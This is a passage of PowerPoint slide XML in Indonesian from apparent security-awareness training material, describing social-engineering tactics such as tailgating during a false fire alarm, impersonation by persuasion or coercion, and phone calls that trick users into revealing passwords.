              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebakaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelinap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekacauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Peniruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berpura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>-pura</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peniruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-pura </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang lain. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peniruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Persuasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsensus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesukaan-meyakinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sopan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aneh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Paksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desakan-mengintimidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukuman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipecat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengerikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peniruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klasik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menelepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengklaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengungkapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cerita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hati-hati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> detail yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meyakinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengintimidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
